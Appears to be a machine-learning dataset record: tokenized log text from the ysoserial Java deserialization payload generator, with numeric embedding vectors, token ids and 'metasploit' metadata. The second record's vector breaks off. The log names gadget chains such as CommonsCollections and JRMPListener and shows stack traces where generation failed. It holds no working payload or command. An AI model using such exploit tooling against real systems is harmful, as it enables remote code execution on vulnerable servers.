: 34 ) error : errored while generating'c3p0'and it will not be supported generating payloads for clojure... generating payloads for commonsbeanutils1... generating payloads for commonscollections1... generating payloads for commonscollections2... generating payloads for commonscollections3... generating payloads for commonscollections4... generating payloads for commonscollections5... generating payloads for commonscollections6... generating payloads for fileupload1... error while generating or serializing payload java. lang. illegalargumentexception : unsupported command [ ] at ysoserial. payloads. fileupload1. getobject ( fileupload1. java : 71 ) at ysoserial. payloads. fileupload1. getobject ( fileupload1. java : 40 ) at ysoserial. generatepayload. main ( generatepayload. java : 34 ) error : errored while generating'fileupload1'and it will not be supported generating payloads for groovy1... generating payloads for hibernate1... generating payloads for hibernate2... error while generating or serializing payload java. sql. sqlexception : datasource name cannot be empty string at javax. sql. rowset. baserowset. setdatasourcename ( baserowset. java : 855 ) at com. sun. rowset. jdbcrowsetimpl. setdatasourcename ( jdbcrowsetimpl. java : 4307 ) at ysoserial. payloads. hibernate2. getobject ( hibernate2. java : 58 ) at ysoserial. generatepayload. main ( generatepayload. java : 34 ) error : errored while generating'hibernate2'and it will not be supported generating payloads for jbossinterceptors1... generating payloads for jrmpclient... generating payloads for jrmplistener... error while generating or serializing payload java. lang. numberformatexception : for input string : " " at java. lang. numberformatexception. forinputst
[ -0.4916508197784424, -0.2905556857585907, -0.3063717186450958, 0.4508346915245056, 0.10456167161464691, -0.23015370965003967, -0.305218368768692, 0.07195798307657242, 0.5464273691177368, 0.07698933035135269, -0.513929545879364, 0.17051060497760773, 0.045726604759693146, -0.6056264638900757, -0.6020255088806152, -0.9537208080291748, -0.6686263084411621, -0.5576603412628174, -1.4580761194229126, 0.01888144202530384, -0.45615214109420776, 0.1381276547908783, -1.1793148517608643, -0.7494596838951111, -0.3522513210773468, 1.223564863204956, 0.39930522441864014, 0.060802388936281204, 0.6526718139648438, 0.4070071876049042, 0.2874463200569153, -0.5933899283409119, 0.5150214433670044, -0.6538023948669434, 0.3236118257045746, -0.09777611494064331, 1.0188283920288086, -0.3677453100681305, 0.6318113207817078, -0.38399800658226013, 0.36475613713264465, -0.4537183940410614, -0.20730015635490417, -0.6853867173194885, -1.0585747957229614, -0.8127871155738831, 0.23145617544651031, 0.2073231041431427, 1.146530270576477, -0.13985034823417664, 0.2624741792678833, 0.2918121814727783, -0.13971339166164398, -0.09286878257989883, -0.229764923453331, -0.09423746168613434, -0.000428373139584437, -0.2128838300704956, -1.164172649383545, -0.006793366279453039, 0.16956451535224915, 0.6817830204963684, 0.5407604575157166, -0.9089317321777344, -0.5674802660942078, 0.20096805691719055, 0.12178260833024979, -0.14128224551677704, 0.032226745039224625, -0.4505918622016907, -0.05063207820057869, 0.8510655164718628, -0.40796104073524475, -0.7039217352867126, -0.6621550917625427, -0.1873132437467575, -0.30826717615127563, -0.49101051688194275, -0.4148210883140564, -0.06516147404909134, -0.3013557493686676, 0.5793398022651672, 0.37360283732414246, -0.19310645759105682, 0.29181456565856934, -0.617452085018158, 0.4331135153770447, 0.5622320771217346, -0.15582428872585297, 0.35827773809432983, 0.26366403698921204, 0.8804248571395874, -0.6589919924736023, 0.36079397797584534, 0.8652159571647644, 0.2530496418476105, -0.446475088596344, 0.4732711911201477, 0.2915838360786438, -0.11646633595228195, 0.5014249682426453, 0.8089675903320312, 0.24732957780361176, 0.6635426878929138, -0.7011825442314148, 0.21415813267230988, 0.2013864815235138, 0.10648880153894424, -0.6352736353874207, -0.16030530631542206, 0.8136693239212036, -0.114204540848732, 0.010490349493920803, -0.8754324316978455, -0.154027059674263, 0.8715490698814392, 0.2592065930366516, 0.2041851133108139, -0.6851064562797546, 0.08891110867261887, 0.08513873815536499, 0.23712846636772156, 0.09986358135938644, -0.4625242054462433, -0.2342553287744522, 0.1692430078983307, 0.7994686365127563, 0.3933728337287903, -0.7282488346099854, -0.1958540678024292, -0.010045835748314857, -0.34777525067329407, -0.17529872059822083, 0.21412348747253418, -0.7907829880714417, 0.44964849948883057, -0.0902906060218811, 0.7185623049736023, 1.0954726934432983, -0.8712795972824097, 0.5029087066650391, 0.3268015682697296, 0.6995275616645813, 1.560195803642273, -0.19851671159267426, -0.476535826921463, 0.06621410697698593, -0.24591366946697235, -0.5160498023033142, 0.46889081597328186, -0.07812156528234482, 0.12489106506109238, 0.6623329520225525, -0.16519401967525482, -0.65736985206604, 0.11197008937597275, -0.4267229437828064, 0.7102248668670654, -0.35883674025535583, -0.5300695896148682, -0.20837090909481049, 1.0209966897964478, -0.26122426986694336, 0.28031250834465027, -0.1509684920310974, -0.04812877997756004, -0.9272379279136658, 0.09034888446331024, -0.5250661969184875, 0.09777522087097168, 0.6779748201370239, 0.21662767231464386, 0.22742930054664612, 0.4791299104690552, 0.8459537029266357, 0.5268115997314453, -0.1478186547756195, -0.33234092593193054, 0.5631514191627502, 0.3809105455875397, -0.5408939719200134, 0.5350987315177917, 0.13883142173290253, 1.2489209175109863, -0.0229453407227993, 0.9633138179779053, -0.4452962577342987, -0.21029320359230042, -0.7190970182418823, -0.4900713264942169, 0.2626807689666748, 1.4031720161437988, -0.9159045219421387, 0.7666069865226746, 0.7271186113357544, 0.292930006980896, -0.7692970633506775, -0.14533782005310059, -0.4871855080127716, -1.4929555654525757, -0.4704464375972748, 0.2831222712993622, 0.3860720694065094, 0.5886437892913818, -0.6108611822128296, -0.652575671672821, 0.5379467010498047, 0.5267577171325684, -0.687755286693573, 0.43458521366119385, 0.6380464434623718, -0.013024979270994663, -0.4191451370716095, -0.01943366788327694, -0.13594171404838562, -0.0012952121905982494, -0.8385869860649109, 0.47646012902259827, 0.318381130695343, 0.19955694675445557, -0.7259317636489868, 0.40089333057403564, 0.8383738398551941, 0.6229221820831299, 0.42429831624031067, -0.4475197196006775, 0.4266516864299774, -0.0006128741079010069, -1.0204588174819946, -0.5794996023178101, 0.040347885340452194, 0.7085912823677063, 1.2148127555847168, 0.8268464207649231, 0.6451113224029541, -0.08676142245531082, 0.6388081908226013, 0.22376255691051483, -0.17496611177921295, 0.3975602686405182, -0.47577959299087524, 1.1496999263763428, 0.5736864805221558, 0.7182905673980713, 0.34573546051979065, 0.05734391137957573, 0.09831678122282028, 0.09690295904874802, 0.8671042323112488, 0.37724289298057556, 0.03577449917793274, 1.0405919551849365, 0.837127685546875, -0.10791327804327011, -0.490673303604126, -0.7846445441246033, 0.5124970078468323, 1.168101191520691, -0.826126754283905, -0.8425155878067017, -0.13096001744270325, 0.07558126747608185, -0.5206843018531799, -0.13241443037986755, 0.254316508769989, 0.6907861828804016, 0.023885823786258698, 0.5926964282989502, 0.0010009051766246557, -0.8794274926185608, -0.4895596504211426, -0.4884116053581238, -1.0868219137191772, -0.2778566777706146, -0.860170841217041, 0.08004740625619888, 0.575782835483551, -0.3680097758769989, 0.7894240617752075, 0.25791844725608826, -1.056600570678711, 0.009992742910981178, 0.37542471289634705, 0.7454726099967957, 0.4874803423881531, -0.38386833667755127, -1.2975581884384155, -0.032120201736688614, -0.1096896305680275, 0.3741151988506317, -0.225398451089859, 0.1472564935684204, 0.7306650280952454, 0.09114516526460648, -0.24014022946357727, -0.38804659247398376, 1.0284243822097778, -0.1258508712053299, -0.0033780063968151808, -0.6039761900901794, -0.16019508242607117, 0.48817452788352966, 0.10185697674751282, 0.6085295677185059, -0.5094882249832153, 0.8244546055793762, -0.19339565932750702, 0.603451669216156, 0.3299980163574219, 0.9607371091842651, -0.9604313373565674, 0.47337600588798523, 0.014421941712498665, 0.35191676020622253, -0.9895595908164978, 0.05309247598052025, -0.03839591518044472, 0.5574598908424377, 0.08689140528440475, -0.04699348285794258, -0.08724205940961838, -0.05737932026386261, -0.13124924898147583, 0.014259012416005135, -0.2771291732788086, 0.8604885935783386, -0.0022225147113204002, -1.0992423295974731, 0.5638414025306702, -0.37319815158843994, 0.1481398344039917, -0.5285013914108276, -0.03730783611536026, 0.521278977394104, 0.4652276337146759, 0.39932069182395935, 0.10465043783187866, -0.5765659213066101, -0.24302028119564056, -0.12785270810127258, 0.0032446293625980616, -0.2090160995721817, -0.02215246856212616, 0.6207554340362549, -0.36719921231269836, 0.12676624953746796, 0.3510569632053375, -0.1649053990840912, -0.0011610179208219051, 0.43915170431137085, -0.8756832480430603, 0.07419595867395401, 0.3354531526565552, 0.08709903061389923, 0.26020190119743347, 0.6861673593521118, -0.10870011150836945, -0.9518777132034302, 0.07747071981430054, 0.13233239948749542, 0.21761582791805267, -0.06860756874084473, 0.406925231218338, -0.16014763712882996, -0.384524941444397, -0.9970159530639648, 0.43446236848831177, 0.3504469096660614, 0.670721709728241, -0.2758953273296356, 0.8021904230117798, -0.2443213164806366, -0.31910526752471924, 0.9259280562400818, -0.43476957082748413, -0.6006036400794983, 0.7760551571846008, -0.05959616228938103, 0.6351367831230164, -0.4025491178035736, 0.27236032485961914, -0.12314486503601074, -0.4156475365161896, 0.7374627590179443, 0.8109744191169739, -0.2286180555820465, -0.48021620512008667, -0.5947169065475464, 0.07711563259363174, -0.7301619052886963, 0.20351266860961914, 0.006972129922360182, -0.19413313269615173, -0.9259357452392578, -0.4587956666946411, -0.1372155249118805, 0.28408628702163696, 0.28246524930000305, 0.5284865498542786, 0.3128778040409088, 0.35947662591934204, 0.701881468296051, -0.30170637369155884, 0.8687667846679688, -0.09672518074512482, 0.536876916885376, -0.00863103661686182, 0.47130000591278076, -0.4249705970287323, -0.1881646066904068, -0.5272364020347595, -0.8627364039421082, -1.0031590461730957, 0.16145460307598114, 0.31095951795578003, -0.22343461215496063, -0.5958475470542908, 0.04969864711165428, 0.10420899838209152, 0.07676380127668381, -0.41036897897720337, -0.16686223447322845, -0.002986925421282649, 0.6158267855644226, 0.4713825583457947, -1.1962814331054688, 0.3751327693462372, -0.3389677107334137, -0.18505580723285675, 0.7019862532615662, 0.21934816241264343, -0.2205534279346466, -0.9876397848129272, -0.6983224749565125, -0.2644445300102234, -0.23912359774112701, 0.43606898188591003, 0.04459119588136673, 0.3600151538848877, -1.1292500495910645, -0.3184821903705597, 0.6124693751335144, 0.3870946168899536, -0.7892813682556152, -0.5424743890762329, 0.3236476182937622, 0.5520590543746948, 0.25244906544685364, -0.774053692817688, -0.3609296381473541, -0.08979476243257523, -0.9592373967170715, 0.18467381596565247, -0.779170572757721, 0.44752421975135803, 0.7375330924987793, -0.1364613175392151, 0.3367837369441986, -0.39566856622695923, -0.5329696536064148, -0.18674303591251373, -0.6316812038421631, 0.524998128414154, 0.00000293622724711895, -0.6830635070800781, 1.2488054037094116, -0.07703378051519394, -0.358843594789505, -0.03137938678264618, 0.4134300947189331, -0.8594989776611328, -0.046327538788318634, -0.46646636724472046, -0.08083125203847885, 0.20393088459968567, -0.6301417946815491, 0.5344043970108032, -0.22712339460849762, -0.1811969131231308, 0.17479585111141205, -0.4156216084957123, 0.9176425337791443, 0.511920154094696, -0.6889791488647461, -1.0613443851470947, -0.9112261533737183, 0.4339958429336548, 0.41103118658065796, -0.5424820184707642, 0.6590001583099365, -0.1939450055360794, -0.5271756649017334, 0.010447830893099308, 0.06578988581895828, -0.7650241255760193, -1.0390907526016235, -0.1827389895915985, 0.10938762873411179, -0.07776938378810883, 0.16516563296318054, 0.7352222800254822, -0.12919819355010986, -0.752812922000885, 0.5619051456451416, -0.2896781861782074, 0.1951630562543869, -0.4884103834629059, -0.1594655066728592, -0.6706599593162537, 0.34140703082084656, -0.12222372740507126, 0.5467305183410645, -0.37956011295318604, 0.19136197865009308, 0.3596542775630951, 0.5543364882469177, 0.6690834760665894, -0.17533345520496368, -1.110676884651184, 0.40271851420402527, -0.013364740647375584, -0.12502436339855194, -0.66459059715271, 1.1626218557357788, -0.29345250129699707, 0.7478557229042053, -0.14250129461288452, -0.11268225312232971, -0.46635258197784424, -0.8960198163986206, -0.04912929609417915, 0.031471651047468185, 0.3094364404678345, -1.1189383268356323, -0.8965946435928345, -0.03175007551908493, 0.33706894516944885, 0.33142217993736267, -1.4961928129196167, -0.08845396339893341, 0.2726655900478363, 0.586013674736023, 0.13990898430347443, 0.21149557828903198, -0.6865224242210388, 0.06677049398422241, -0.5486311316490173, 0.5158910751342773, 0.350795716047287, -0.2635050415992737, 0.09766636043787003, 0.42542871832847595, 0.2446000874042511, 0.2547423839569092, -0.8776572346687317, -0.8355131149291992, -0.5700443387031555, -0.24821437895298004, -0.25913751125335693, 0.33381807804107666, -0.445945680141449, 0.6082227230072021, -0.4625289738178253, -0.2124694585800171, 0.2230164110660553, -0.31668421626091003, 0.25291359424591064, 0.598124623298645, 0.800955593585968, -0.24749264121055603, 0.2989861071109772, -0.13971272110939026, 0.5700111389160156, 0.3681527078151703, -0.4941974878311157, -1.0568218231201172, -0.04352889955043793, -0.5326848030090332, -1.3114804029464722, 0.35262590646743774, 0.015085517428815365, -0.729094922542572, 0.3526478409767151, 0.3194003105163574, 0.275890052318573, 0.22713428735733032, 0.8485199809074402, 0.9922237396240234, 0.49152475595474243, -0.12092435359954834, -0.5804081559181213, 0.6535504460334778, 0.2360798418521881, -0.13971205055713654, 0.18595506250858307, 0.3677552342414856, -0.22798456251621246, -0.1485481858253479, -0.09743897616863251, -0.5683672428131104, -1.132332682609558, -0.9580246210098267, 1.0466524362564087, -0.02631908655166626, 0.5163191556930542, -0.22440512478351593, -0.509525716304779, -0.8660681843757629, 0.29915153980255127, -0.20084086060523987, -0.2635915279388428, 0.9436895847320557, 0.5602129101753235, 0.4334927201271057, -0.039986640214920044, 0.06709346920251846, -0.1439930498600006, -0.13933967053890228, 0.21451832354068756, -0.076249860227108, -0.421718955039978, 0.3421573042869568, 0.9852244853973389, -0.7399094700813293, -0.3761340379714966, -0.3752143085002899, -0.3539712429046631, -0.11280567198991776, -0.3484584391117096, -0.6375223994255066, 0.4574752449989319, 0.3996438980102539, -0.1120155081152916, 0.29271769523620605, 0.26159027218818665, 1.015127182006836, -0.8377059102058411, 0.6334242820739746, -0.008069351315498352, 0.38617753982543945, 0.5633800625801086, -0.0268987026065588, -0.014674154110252857, -1.034080147743225, -0.07753152400255203, 0.44624465703964233, -0.18749351799488068, 0.8651604652404785, 0.14248590171337128, -0.01785343885421753, 0.46600472927093506, 0.020605748519301414, 0.4148615896701813, -0.05083140358328819, 0.25426027178764343, 0.9250916838645935, 0.20303967595100403, -0.3238157331943512, -0.16919344663619995, 0.26987746357917786, 0.10590008646249771, 0.23856642842292786, -0.10861986875534058, -0.7321986556053162, -0.5290694236755371, 0.3032156825065613, -0.3704227805137634, -0.5865419507026672, -1.0497891902923584, -0.45505648851394653, -0.5270782113075256, 0.17327477037906647, -0.25933638215065, -0.7009077668190002, -0.27822601795196533, 0.22653795778751373, 0.09304840862751007, -0.5370967984199524, 0.3644014000892639, -0.7579517960548401, 0.29863590002059937, -0.7783374190330505, -0.13762320578098297, -0.9741278290748596, -0.6446394920349121, -0.7675296664237976, -0.2508937120437622, 0.2594570815563202, -0.811244785785675, -0.7007431983947754, -0.3263338506221771, -0.4827822744846344, 0.9717468023300171, -0.8708062767982483, 0.06808497756719589, 0.11258082836866379, -1.0852373838424683, 0.5912585854530334, 0.5344216227531433, -0.17177234590053558, 0.4783838987350464, 0.15223394334316254, 0.4941082298755646, 0.30965691804885864, -0.25569838285446167, -0.41110172867774963, -0.10549019277095795, -0.05175863951444626, -0.0054360185749828815, -0.542846143245697, -0.4948909878730774, 0.3441161513328552, 0.5824599266052246, -0.9023218750953674, 0.06598085910081863, -0.15945187211036682, -0.07216034829616547, 0.030034322291612625, -0.2678769528865814, -0.03536543250083923, 1.122525930404663, -0.16042335331439972, 0.5472269058227539, -0.5480766296386719, 1.251430630683899, 0.3152898848056793, -0.04464668035507202, 0.5199634432792664, 0.5229595303535461, 0.0905088558793068, -0.20975404977798462, 0.07843023538589478, 0.3056795299053192, -0.23522090911865234, 0.5202711820602417, 0.07075187563896179, -0.14773677289485931, -0.49646517634391785, -0.8883177638053894, 0.21846885979175568, 0.6955689191818237, 0.5555897355079651, -0.28843626379966736, 0.4287300109863281, 0.20156370103359222, -0.3151911199092865, 0.2590932548046112, -1.0829144716262817, -0.6236516833305359, -0.252565860748291, -1.001821517944336, -0.37421509623527527, -0.6010385751724243, -0.368877112865448, -0.24934768676757812, -0.1594890058040619, -0.27517592906951904, 0.1165071502327919, 0.11400622874498367, -0.060895852744579315, 1.0662481784820557, -0.5321303606033325, -0.5524935722351074, -0.0023586859460920095, 0.5417983531951904, -0.8252165913581848, -1.3390182256698608, 0.05728929117321968, 0.9124546647071838, 1.033801555633545, -0.224430114030838, 0.17984460294246674, 0.7456912398338318, 0.008086363784968853, 0.18152499198913574, -0.22874930500984192, -0.04851239174604416, -0.40684160590171814, 0.31465503573417664, -0.054589882493019104, 0.5166070461273193, -0.20691774785518646, 0.892707109451294, 0.4600912034511566, -0.11115236580371857, -0.3954898715019226, 0.6952708959579468, 0.16911692917346954, 0.15352436900138855, 0.09525036066770554, 0.9772088527679443, -0.22261254489421844, -0.5814447402954102, 0.3075427711009979, -0.25673002004623413, 0.03336641937494278, 0.5438829660415649, 0.462375283241272, 0.12939928472042084, 0.5293353199958801, 0.4378041923046112, -0.8178207874298096, -0.5569261908531189, 1.3654859066009521, -0.12707734107971191, -0.14152975380420685, 0.21639196574687958, 0.31079524755477905, 0.08006294071674347, 0.5553937554359436, -0.1609545648097992, 0.17112115025520325, -0.2255163937807083, -0.015497246757149696, 0.3235534131526947, 0.04460032656788826, 0.8607518076896667, -0.2748275399208069, 0.44887644052505493, -0.21287424862384796, -0.35265228152275085, 0.22798709571361542, 0.3018186390399933, -0.9299806356430054, 0.39055007696151733, 0.5933501720428467, 0.38093438744544983, -0.11938216537237167, 0.4976666271686554, -0.2670762538909912, 0.4527965486049652, 0.5040490627288818, -0.36034634709358215, -0.21818698942661285, 0.5105198621749878, -0.2041321098804474, -0.7231440544128418, -0.47284847497940063, 0.04069894552230835, 0.344564288854599, -0.03013523668050766, 0.592519998550415, -0.011291367933154106, 0.20743004977703094, -0.37339749932289124, 0.9511996507644653, -0.4988868832588196, 0.13847525417804718, -0.0013015300501137972, 0.046308886259794235, -0.6548675894737244, 1.1007444858551025, -0.012995217926800251, 0.7254884243011475, 0.28037554025650024, 1.111769437789917, -0.4378568232059479, 0.015881014987826347, 0.0026147293392568827, -0.20448769629001617, -0.7280685305595398, -0.15520091354846954, -0.3341508209705353, -0.35589566826820374, 0.318403422832489, -0.5686410665512085, 0.3606798052787781, -0.40934932231903076, -0.6223422288894653, -0.8589428067207336, 0.3170543611049652, -0.4460122883319855, -1.3678659200668335, 0.7198376655578613, 0.39505016803741455, -0.5555770397186279, 0.038616541773080826, 0.20776335895061493, 0.3594447076320648, 0.23000261187553406, -0.23211050033569336, -0.873515784740448, -0.3689669966697693, 0.4206943213939667, 0.2831883430480957, 1.1894160509109497, -0.38817575573921204, -0.32751643657684326, -0.2418125867843628, -0.715686559677124, -0.4908818304538727, 0.03714977577328682, -0.30953922867774963, -0.6471384167671204, -0.11933053284883499, 0.704485297203064, 0.5281550884246826, 0.3442189693450928, 0.32245656847953796, -0.48337191343307495, 0.361924409866333, 0.9250320792198181, -0.5281304717063904, 0.5450931787490845, 0.9180207252502441, 0.3713468909263611, 0.40282130241394043, -0.3713584542274475, 0.7299115061759949, -0.479625403881073, -0.03657950833439827, -0.46045610308647156, 0.21155041456222534, -0.3540250062942505, -0.44382643699645996, -0.3235476016998291, 0.4039627015590668, 0.23530210554599762, 0.007989211939275265, -1.4787601232528687, -0.25535812973976135, 0.060196198523044586, -0.3583860993385315, -0.48354068398475647, 0.5396426916122437, 0.2009282112121582, -0.49157434701919556, 0.4245579242706299, -1.2360892295837402, 4.003174304962158, -0.5552472472190857, 0.48367464542388916, 0.028987200930714607, 0.36216264963150024, 0.4918888509273529, 1.156890869140625, -0.6028633713722229, 0.45252811908721924, -0.059335727244615555, -0.5188583135604858, -0.177421435713768, 0.5097398161888123, 0.6975386142730713, 0.2680383622646332, 0.3279450535774231, -1.3790196180343628, 0.44859468936920166, 0.2953052818775177, -1.0775985717773438, -0.9945058226585388, -0.47494032979011536, -0.4254808723926544, 0.6616390943527222, -0.09187658876180649, -0.3385421633720398, -0.32747992873191833, -0.45521238446235657, 0.12882915139198303, 0.032717686146497726, 0.29773959517478943, -0.14747637510299683, -0.00560353696346283, 0.4710857570171356, -0.5897045135498047, -0.07338161766529083, 0.6873061656951904, -1.009026050567627, -0.5455726981163025, -0.49499258399009705, 0.6939465403556824, 0.0033515379764139652, 0.2624058425426483, -0.9210096597671509, 0.641664981842041, 0.14513836801052094, -1.0232664346694946, 0.2962261438369751, 0.30637457966804504, -1.0954431295394897, 0.9139854907989502, 0.11976376920938492, 0.8787792921066284, 0.3290965259075165, -1.0307782888412476, -0.10636812448501587, -0.33755674958229065, -0.3981024920940399, 0.1047152429819107, 0.15748049318790436, 0.5751791596412659, -0.7183741331100464, 0.5239121317863464, 0.22041350603103638, -1.3807331323623657, 0.5105890035629272, -0.1813115030527115, 0.26701244711875916, 0.3833352029323578, -0.015231343917548656, 0.2843548655509949, -0.42031216621398926, -0.44865041971206665, -0.11898619681596756, 1.0990447998046875, 0.34380605816841125, -0.2738543152809143, 0.3223872184753418, 0.5159206390380859, -0.5990551114082336, 0.34108248353004456, -0.200172558426857, -0.9107561111450195, -0.03110636956989765, 1.0666139125823975, 0.5030210614204407, -0.4120560586452484, -0.4208017587661743, 0.10373049974441528, -0.13149279356002808, 0.2681151032447815, 0.8207842707633972, -0.7435115575790405, 0.26305514574050903, 0.46568408608436584 ]
[ 1024, 4090, 1007, 7561, 1024, 7561, 2098, 2096, 11717, 1005, 1039, 2509, 2361, 2692, 1005, 1998, 2009, 2097, 2025, 2022, 3569, 11717, 18093, 2015, 2005, 18856, 29147, 5397, 1012, 1012, 1012, 11717, 18093, 2015, 2005, 7674, 4783, 24076, 3775, 4877, 2487, 1012, 1012, 1012, 11717, 18093, 2015, 2005, 7674, 26895, 18491, 2015, 2487, 1012, 1012, 1012, 11717, 18093, 2015, 2005, 7674, 26895, 18491, 2015, 2475, 1012, 1012, 1012, 11717, 18093, 2015, 2005, 7674, 26895, 18491, 2015, 2509, 1012, 1012, 1012, 11717, 18093, 2015, 2005, 7674, 26895, 18491, 2015, 2549, 1012, 1012, 1012, 11717, 18093, 2015, 2005, 7674, 26895, 18491, 2015, 2629, 1012, 1012, 1012, 11717, 18093, 2015, 2005, 7674, 26895, 18491, 2015, 2575, 1012, 1012, 1012, 11717, 18093, 2015, 2005, 5371, 6279, 11066, 2487, 1012, 1012, 1012, 7561, 2096, 11717, 2030, 7642, 6026, 18093, 9262, 1012, 11374, 1012, 6206, 2906, 22850, 15781, 2595, 24422, 1024, 4895, 6342, 9397, 15613, 3094, 1031, 1033, 2012, 1061, 17063, 11610, 2140, 1012, 18093, 2015, 1012, 5371, 6279, 11066, 2487, 1012, 2131, 16429, 20614, 1006, 5371, 6279, 11066, 2487, 1012, 9262, 1024, 6390, 1007, 2012, 1061, 17063, 11610, 2140, 1012, 18093, 2015, 1012, 5371, 6279, 11066, 2487, 1012, 2131, 16429, 20614, 1006, 5371, 6279, 11066, 2487, 1012, 9262, 1024, 2871, 1007, 2012, 1061, 17063, 11610, 2140, 1012, 9699, 4502, 8516, 10441, 2094, 1012, 2364, 1006, 9699, 4502, 8516, 10441, 2094, 1012, 9262, 1024, 4090, 1007, 7561, 1024, 7561, 2098, 2096, 11717, 1005, 5371, 6279, 11066, 2487, 1005, 1998, 2009, 2097, 2025, 2022, 3569, 11717, 18093, 2015, 2005, 24665, 9541, 10736, 2487, 1012, 1012, 1012, 11717, 18093, 2015, 2005, 7632, 5677, 12556, 2487, 1012, 1012, 1012, 11717, 18093, 2015, 2005, 7632, 5677, 12556, 2475, 1012, 1012, 1012, 7561, 2096, 11717, 2030, 7642, 6026, 18093, 9262, 1012, 29296, 1012, 29296, 10288, 24422, 1024, 2951, 6499, 3126, 3401, 2171, 3685, 2022, 4064, 5164, 2012, 9262, 2595, 1012, 29296, 1012, 10281, 3388, 1012, 2918, 10524, 13462, 1012, 2275, 2850, 10230, 8162, 27524, 14074, 1006, 2918, 10524, 13462, 1012, 9262, 1024, 5594, 2629, 1007, 2012, 4012, 1012, 3103, 1012, 10281, 3388, 1012, 26219, 9818, 10524, 13462, 5714, 24759, 1012, 2275, 2850, 10230, 8162, 27524, 14074, 1006, 26219, 9818, 10524, 13462, 5714, 24759, 1012, 9262, 1024, 19540, 2581, 1007, 2012, 1061, 17063, 11610, 2140, 1012, 18093, 2015, 1012, 7632, 5677, 12556, 2475, 1012, 2131, 16429, 20614, 1006, 7632, 5677, 12556, 2475, 1012, 9262, 1024, 5388, 1007, 2012, 1061, 17063, 11610, 2140, 1012, 9699, 4502, 8516, 10441, 2094, 1012, 2364, 1006, 9699, 4502, 8516, 10441, 2094, 1012, 9262, 1024, 4090, 1007, 7561, 1024, 7561, 2098, 2096, 11717, 1005, 7632, 5677, 12556, 2475, 1005, 1998, 2009, 2097, 2025, 2022, 3569, 11717, 18093, 2015, 2005, 1046, 15853, 11493, 3334, 3401, 13876, 5668, 2487, 1012, 1012, 1012, 11717, 18093, 2015, 2005, 3781, 8737, 20464, 11638, 1012, 1012, 1012, 11717, 18093, 2015, 2005, 3781, 8737, 9863, 24454, 1012, 1012, 1012, 7561, 2096, 11717, 2030, 7642, 6026, 18093, 9262, 1012, 11374, 1012, 2193, 14192, 3686, 2595, 24422, 1024, 2005, 7953, 5164, 1024, 1000, 1000, 2012, 9262, 1012, 11374, 1012, 2193, 14192, 3686, 2595, 24422, 1012, 2005, 2378, 18780, 3367 ]
metasploit
133.txt
3
##ring ( numberformatexception. java : 65 ) at java. lang. integer. parseint ( integer. java : 592 ) at java. lang. integer. parseint ( integer. java : 615 ) at ysoserial. payloads. jrmplistener. getobject ( jrmplistener. java : 42 ) at ysoserial. payloads. jrmplistener. getobject ( jrmplistener. java : 34 ) at ysoserial. generatepayload. main ( generatepayload. java : 34 ) error : errored while generating'jrmplistener'and it will not be supported generating payloads for json1... generating payloads for javassistweld1... generating payloads for jdk7u21... generating payloads for jython1... error while generating or serializing payload java. lang. illegalargumentexception : unsupported command [ ] at ysoserial. payloads. jython1. getobject ( jython1. java : 52 ) at ysoserial. payloads. jython1. getobject ( jython1. java : 42 ) at ysoserial. generatepayload. main ( generatepayload. java : 34 ) error : errored while generating'jython1'and it will not be supported generating payloads for mozillarhino1... generating payloads for myfaces1... generating payloads for myfaces2... error while generating or serializing payload java. lang. illegalargumentexception : command format is : < base _ url > : < classname > at ysoserial. payloads. myfaces2. getobject ( myfaces2. java : 47 ) at ysoserial. generatepayload. main ( generatepayload. java : 34 ) error : errored while generating'myfaces2'and it will not be supported generating payloads for rome... generating payloads for spring1... generating payloads for spring2... generating payloads for urldns... error while generating or serializing payload java. net. malformedurlexception : no protocol : at java. net. url
[ -0.008437669835984707, -0.15623372793197632, -0.30431345105171204, 0.36566466093063354, -0.4633111357688904, 0.04243834316730499, -0.26235470175743103, -0.1181364431977272, 0.3780020475387573, 0.4804048240184784, -0.013607264496386051, -0.0613802894949913, -0.038956496864557266, -0.42122092843055725, -0.6616113185882568, -0.5776816010475159, -0.8552435636520386, -0.3812854290008545, -0.9084975123405457, -0.308272123336792, -0.06905511766672134, 0.5658169388771057, -0.6839542984962463, -0.651332437992096, 0.12441357970237732, 1.1898831129074097, 0.432671457529068, 0.38712212443351746, 0.3254828453063965, 0.4685318171977997, 0.26659002900123596, -0.32928431034088135, 0.6035345792770386, -0.7914940714836121, -0.010038500651717186, -0.0018762643449008465, 0.8572840690612793, -0.5160605311393738, 0.7012274265289307, -0.3074709177017212, 0.6983357667922974, -0.33340194821357727, -0.09932369738817215, -0.3122691512107849, -0.6566787362098694, -0.7332820892333984, 0.3644692301750183, -0.2700154185295105, 0.6016140580177307, 0.18068604171276093, 0.15717926621437073, 0.14909683167934418, 0.14951539039611816, 0.0665997564792633, -0.023761169984936714, -0.028164947405457497, -0.007710800040513277, -0.20722121000289917, -0.6515025496482849, 0.07364951074123383, -0.27113303542137146, 0.3870857357978821, 0.2148735076189041, -0.9209516644477844, -0.43342846632003784, -0.1560916304588318, 0.13568468391895294, -0.3335089683532715, 0.10426973551511765, -0.4594973623752594, -0.5046149492263794, 0.8610038161277771, -0.457110196352005, -0.43540239334106445, -0.3598933219909668, -0.04344632849097252, -0.5238933563232422, -0.24363790452480316, -0.3297484815120697, 0.2150062918663025, -0.42223113775253296, 0.28600385785102844, -0.017164047807455063, -0.26969489455223083, -0.20977841317653656, -0.48400717973709106, 0.3446342647075653, 0.7586665749549866, -0.27450504899024963, 0.4635707139968872, 0.4220007061958313, 0.7422256469726562, -1.0930496454238892, 0.10312767326831818, 0.3746159076690674, 0.33998340368270874, -0.06661748886108398, 0.17638692259788513, 0.2693922221660614, -0.2175215780735016, 0.6168338656425476, 0.39652639627456665, 0.16691075265407562, 0.6922987103462219, -0.5359213352203369, 0.21071678400039673, 0.02369382418692112, -0.09406629949808121, -0.34726718068122864, -0.2208898514509201, 0.8492318391799927, 0.060786616057157516, 0.18038100004196167, -0.6984290480613708, 0.06689123809337616, 0.42858192324638367, 0.4731427729129791, 0.3877491354942322, -0.3876818120479584, 0.9268435835838318, -0.29191985726356506, -0.1181451678276062, 0.325054407119751, 0.1651543229818344, -0.05781508982181549, 0.2263067364692688, 0.29494279623031616, 0.6675846576690674, -0.7517662644386292, -0.004603871610015631, -0.03676288202404976, -0.2725929319858551, -0.08976080268621445, 0.45432886481285095, -0.4553377032279968, 0.4323473274707794, -0.24170878529548645, 0.32875338196754456, 1.036943793296814, -0.7481486797332764, 0.0697716698050499, 0.053774766623973846, 0.34900179505348206, 1.6308492422103882, 0.23607131838798523, -0.06278243660926819, -0.0022090093698352575, 0.06882930546998978, -0.2014993578195572, 0.1629296988248825, -0.2638232409954071, -0.166630357503891, 